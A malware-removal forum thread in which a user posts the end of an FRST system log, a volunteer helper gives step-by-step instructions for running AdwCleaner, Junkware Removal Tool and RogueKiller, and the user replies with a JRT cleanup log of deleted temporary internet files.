(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2015-09-09 18:07 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\kathy\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: ose => 3
MSCONFIG\Services: osppsvc => 3
MSCONFIG\Services: p2pimsvc => 3
MSCONFIG\Services: PerfHost => 3
MSCONFIG\Services: pla => 3
MSCONFIG\Services: PNRPAutoReg => 3
MSCONFIG\Services: PNRPsvc => 3
MSCONFIG\Services: PolicyAgent => 3
MSCONFIG\Services: ProtectedStorage => 3
MSCONFIG\Services: seclogon => 3
MSCONFIG\Services: SensrSvc => 3
MSCONFIG\Services: SessionEnv => 3
MSCONFIG\Services: SstpSvc => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Secunia PSI Tray.lnk => C:\Windows\pss\Secunia PSI Tray.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AMD AVT => Cmd.exe /c start "AMD Accelerated Video Transcoding device initialization" /min "C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe" aml
MSCONFIG\startupreg: ApnTBMon => "C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: EvtMgr6 => C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
MSCONFIG\startupreg: Google Update => "C:\Users\kathy\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: iCloudServices => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
MSCONFIG\startupreg: IntelliPoint => "C:\Program Files\Microsoft IntelliPoint\ipoint.exe"
MSCONFIG\startupreg: ISTray => "C:\Program Files (x86)\PC Tools\PC Tools Security\pctsGui.exe" /hideGUI
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: itype => "c:\Program Files\Microsoft IntelliType Pro\itype.exe"
MSCONFIG\startupreg: JMB36X IDE Setup => C:\Windows\RaidTool\xInsIDE.exe
MSCONFIG\startupreg: Launch LGDCore => "C:\Program Files\Logitech\GamePanel Software\G-series Software\LGDCore.exe" /SHOWHIDE
MSCONFIG\startupreg: Launch LgDeviceAgent => "C:\Program Files\Logitech\GamePanel Software\LgDevAgt.exe"
MSCONFIG\startupreg: Logitech Download Assistant => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
MSCONFIG\startupreg: MobileDocuments => C:\Program Files (x86)\Common Files\Apple\Internet Services\ubd.exe
MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RealDownloader => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: swg => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{806F3C11-6F75-447F-9EA4-9859453637B9}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{702D8959-1637-4658-91D4-F73E7C44B0A4}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{C82D830F-6889-483E-9BB8-57F2C59F17AE}] => (Allow) svchost.exe
FirewallRules: [{DB409C55-9F87-40AD-9F89-0E66BBE92147}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [TCP Query User{15CB89E7-D9B6-4EDF-9A46-EC69D93C0EF2}C:\program files (x86)\ventsrv\ventrilo_srv.exe] => (Allow) C:\program files (x86)\ventsrv\ventrilo_srv.exe
FirewallRules: [UDP Query User{008A6BCF-B7A2-4466-8AF8-ADCB80564557}C:\program files (x86)\ventsrv\ventrilo_srv.exe] => (Allow) C:\program files (x86)\ventsrv\ventrilo_srv.exe
FirewallRules: [{45BB01A2-570F-4C78-B467-DE3A8DE35372}] => (Allow) C:\Program Files (x86)\Ventrilo\Ventrilo.exe
FirewallRules: [{802E0A51-E2BE-4EDD-8DF7-26A1A42E5CED}] => (Allow) C:\Program Files (x86)\Ventrilo\Ventrilo.exe
FirewallRules: [{4A4C3BDE-11D3-470E-8085-45671BCF9972}] => (Allow) C:\Program Files\HP\HP Deskjet 1050 J410 series\Bin\USBSetup.exe
FirewallRules: [{7A4288F4-6C37-4455-AF7B-B91DAF8D399C}] => (Allow) C:\Program Files\HP\HP Deskjet 1050 J410 series\Bin\USBSetup.exe
FirewallRules: [{F7BD0B6A-9437-4542-89E1-E7D16DBEF127}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A5C265EF-7356-445B-ABBB-E6AC3051EE62}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{127DD0A4-19E9-44DA-813C-4F268679E633}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DFD31849-6BD6-46C2-9D02-2E731F9EFB36}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5E3CDC62-52A9-41F7-A831-43B35B9DFC8A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D7D47563-8EDF-4AFF-BCE2-1CBCC8C1FDC7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5F2B5AD6-7313-4EB3-B8F6-D5221C16A4F3}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{FF6439A9-1942-4AFA-9C54-1CBF4D22C7BF}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4EDC91C7-C2FD-4DB3-A1D1-4F59536506E2}] => (Allow) LPort=3724
FirewallRules: [{14EC9744-BFD0-42CA-A786-5FCAE0582857}] => (Allow) LPort=1119
FirewallRules: [{DB1F0E42-FEBB-43CD-8896-F01BBC372821}] => (Allow) LPort=1120
FirewallRules: [{7DC5CBF6-4F7E-47A8-9EF6-1B527297DEA5}] => (Allow) LPort=4000
FirewallRules: [{10962630-EDBC-4B5B-A0B0-BAD1BC9ED10B}] => (Allow) LPort=6113
FirewallRules: [{7395515B-C7E9-4A88-BE24-01453631D8FB}] => (Allow) LPort=6114
FirewallRules: [{7CA9A711-AD5A-438D-A3FB-F5D93E0434E4}] => (Allow) LPort=443
FirewallRules: [{0406B5BD-6254-48EC-AD34-1E1AE004760B}] => (Allow) LPort=3074
FirewallRules: [{A40A9973-5DCC-49B2-A3A3-E50EB0993F65}] => (Allow) LPort=5223
FirewallRules: [{93D85615-536B-490D-A18F-37B5F5605508}] => (Allow) LPort=4433
FirewallRules: [TCP Query User{32015787-21B8-4EA4-BED8-CFB4B054310D}C:\program files (x86)\diablo iii\diablo iii.exe] => (Allow) C:\program files (x86)\diablo iii\diablo iii.exe
FirewallRules: [UDP Query User{FB8D0144-653F-4B53-99C1-B661B930121F}C:\program files (x86)\diablo iii\diablo iii.exe] => (Allow) C:\program files (x86)\diablo iii\diablo iii.exe
FirewallRules: [TCP Query User{F994674E-2FFB-4EBE-A780-44D61573DF57}C:\program files (x86)\diablo iii\diablo iii.exe] => (Block) C:\program files (x86)\diablo iii\diablo iii.exe
FirewallRules: [UDP Query User{DE0F8841-61AB-4180-8D41-18FCBC6AA670}C:\program files (x86)\diablo iii\diablo iii.exe] => (Block) C:\program files (x86)\diablo iii\diablo iii.exe
FirewallRules: [{42CA28DE-5285-4733-AC1F-9DFD9661B6B8}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{F78974D6-E528-4087-9B4C-D204797BDCBB}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{2AA758D6-C1E0-4278-9DB2-9258500466AB}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{F6077656-A1E0-4AC7-A4B3-9336679349A8}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{31338F44-7581-48FD-97E4-082661EA27F1}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{343475D0-7374-455A-8FD5-3FE2AF6305C0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{BF4A15C9-E5C1-4C4B-8C36-C8B673340D87}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{9C144172-CED3-4146-8EB3-AA32571B3F4E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2DDF25DF-8E98-45FF-A27E-CD2AE1757529}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
FirewallRules: [TCP Query User{69C66612-D67F-4632-B305-2CD6B3509120}C:\program files (x86)\diablo iii public test\diablo iii.exe] => (Allow) C:\program files (x86)\diablo iii public test\diablo iii.exe
FirewallRules: [UDP Query User{48C21F4B-8717-4696-A0D8-25B572C4183D}C:\program files (x86)\diablo iii public test\diablo iii.exe] => (Allow) C:\program files (x86)\diablo iii public test\diablo iii.exe
FirewallRules: [{8B6A1E59-CD0C-4FF6-9961-48CC21485E9B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7F54D2D8-29E3-496F-A62C-C46DEF313417}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{3101E754-58BE-459C-A32D-0637E93406EB}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{22AC46FC-B7AB-4B68-97D5-B4709674D3B7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{2B812C14-C393-49E0-916F-3AC360A749ED}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D50835DF-14C2-4448-A015-0CE6E13B6474}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6FC68589-758D-4977-B468-E3B792DA95A2}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{7B53F517-8A2C-40F9-B0C1-70431873625D}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{2D76B4FB-0647-4057-8451-D27A3C29CC8B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{A5BBE726-F6C8-459E-AD9B-84533A5010C4}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{41D1C9A1-BC58-4F04-B0BF-6EC55DC260CB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{9D254BF8-ABA9-4CAD-A663-06DB5A069323}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

17-04-2016 19:00:15 Windows Backup
24-04-2016 19:00:06 Windows Backup
01-05-2016 19:00:08 Windows Backup

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (04/30/2016 04:08:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc414
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0310ef48
Faulting process id: 0xb68
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3

Error: (04/30/2016 04:08:08 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/30/2016 04:07:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc414
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0310ef48
Faulting process id: 0x%9
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3

Error: (04/30/2016 04:07:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc414
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x030aef48
Faulting process id: 0x%9
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3

Error: (04/30/2016 04:07:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc414
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0310ef48
Faulting process id: 0x%9
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3

Error: (04/29/2016 11:31:26 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/27/2016 06:06:29 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/24/2016 08:16:54 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/22/2016 10:06:42 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program firefox.exe version 45.0.2.5941 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 3244

Start Time: 01d199cffc06d408

Termination Time: 740

Application Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

Report Id: c9b26ce5-089b-11e6-9bad-f46d0494433e

Error: (04/22/2016 10:06:40 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 45.0.2.5941, time stamp: 0x57071d64
Faulting module name: mozglue.dll, version: 45.0.2.5941, time stamp: 0x57070ebc
Exception code: 0x80000003
Fault offset: 0x0000ec22
Faulting process id: 0x40dc
Faulting application start time: 0xplugin-container.exe0
Faulting application path: plugin-container.exe1
Faulting module path: plugin-container.exe2
Report Id: plugin-container.exe3


System errors:
=============
Error: (04/30/2016 04:07:07 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Apple Mobile Device Service service failed to start due to the following error:
%%1053

Error: (04/30/2016 04:07:07 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Apple Mobile Device Service service to connect.

Error: (04/30/2016 04:06:23 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 10:53:56 AM on ‎4/‎30/‎2016 was unexpected.

Error: (04/29/2016 11:30:53 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 11:29:34 AM on ‎4/‎29/‎2016 was unexpected.

Error: (04/27/2016 06:05:27 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 12:59:09 PM on ‎4/‎27/‎2016 was unexpected.

Error: (04/16/2016 12:40:03 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 12:37:34 PM on ‎4/‎16/‎2016 was unexpected.

Error: (04/11/2016 05:52:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Search service failed to start due to the following error:
%%1053

Error: (04/11/2016 05:52:30 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Search service to connect.

Error: (04/11/2016 05:52:30 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1053WSearch{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (04/11/2016 05:52:28 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-2500K CPU @ 3.30GHz
Percentage of memory in use: 48%
Total physical RAM: 8173.43 MB
Available physical RAM: 4169.56 MB
Total Virtual: 16345.07 MB
Available Virtual: 12254.57 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:931.41 GB) (Free:802.34 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4292DBF1)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


LastRegBack: 2016-04-28 00:10

==================== End of FRST.txt ============================

Hello kitzie and welcome to the WTT forum.

My name is Satchfan and I would be glad to help you with your computer problem.

Please read the following guidelines which will help to make cleaning your machine easier:

  • please follow all instructions in the order posted
  • please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear
  • all logs/reports, etc. must be posted in Notepad. Please ensure that word wrap is unchecked. In Notepad click Format, uncheck Word wrap if it is checked
  • if you don't understand something, please don't hesitate to ask for clarification before proceeding
  • the fixes are specific to your problem and should only be used for this issue on this machine.
  • please reply within 3 days. If you do not reply within this period I will post a reminder but topics with no reply in 4 days will be closed!

IMPORTANT:

Please DO NOT install/uninstall any programs unless asked to.
Please DO NOT run any scans other than those requested

===================================================

Note: Please run these in the order given in the instructions.

===================================================

Download and run AdwCleaner

Download AdwCleaner from here and save it to your desktop.


  • run AdwCleaner by clicking on Scan
  • when it has finished, leave everything that was found checked, (ticked), then click on Clean
  • if it asks to reboot, allow the reboot
  • on reboot a log will be produced; please attach the content of the log to your next reply.

===================================================

Download and run Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.

  • shut down your protection software now to avoid potential conflicts.
  • run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator"
  • the tool will open and start scanning your system
  • please be patient as this can take a while to complete depending on your system's specifications
  • on completion, a log (JRT.txt) is saved to your desktop and will automatically open
  • post the contents of JRT.txt into your next message.

===================================================

Run RogueKiller

IMPORTANT: Please remove any usb or external drives from the computer before you run this scan!

Close all running programs.


Download RogueKiller to your desktop

  • close all running programs
  • for Windows Vista/Seven, right click -> run as administrator, for XP simply double-click on RogueKiller.exe
  • when the pre-scan is finished, click on Scan
  • click on Report and copy/paste the content in your next post
  • NOTE: DO NOT attempt to remove anything that the scan detects –everything that is reported is not necessarily bad

If the program is blocked, continue to try it several times. If it still doesn’t work, (it could happen), rename it to winlogon.exe.

Please post the contents of the RKreport.txt in your next reply.

Logs to include with next post:

AdwCleaner log
RKreport.txt
JRT.txt


Thanks

Satchfan

 

I ran ADWCleaner with success, but I realized I had not saved the report until after I had run the next one.  Did not  want to run it out of order. Here are the results of the other two.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.6 (04.25.2016)
Operating System: Windows 7 Home Premium x64
Ran by [removed] (Administrator) on Tue 05/03/2016 at  6:22:24.32
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 48

Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0DUG8A4B (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PJAOL17 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1E6364JI (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1WXMB4BW (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\532Z922J (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\C3PPB5K3 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DYLA6BUU (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EWGG614L (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G6O5GV22 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G8C82C1E (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GLVKQXHL (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GZF8BZMS (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JOMTRJBM (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MLYOV5KD (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MXRZC9HI (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NK3XMOH6 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PESFS3AF (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PPP63411 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QASYYXIA (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QPPO7NS0 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SRQTHUX2 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VZBTIO8O (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZH1FI5TH (Temporary Internet Files Folder)
Successfully deleted: C:\Users\kathy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZNBMNG57 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0DUG8A4B (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PJAOL17 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1E6364JI (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1WXMB4BW (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\532Z922J (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\C3PPB5K3 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DYLA6BUU (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EWGG614L (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G6O5GV22 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G8C82C1E (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GLVKQXHL (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GZF8BZMS (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JOMTRJBM (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MLYOV5KD (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MXRZC9HI (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NK3XMOH6 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PESFS3AF (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PPP63411 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QASYYXIA (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QPPO7NS0 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SRQTHUX2 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VZBTIO8O (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZH1FI5TH (Temporary Internet Files Folder)
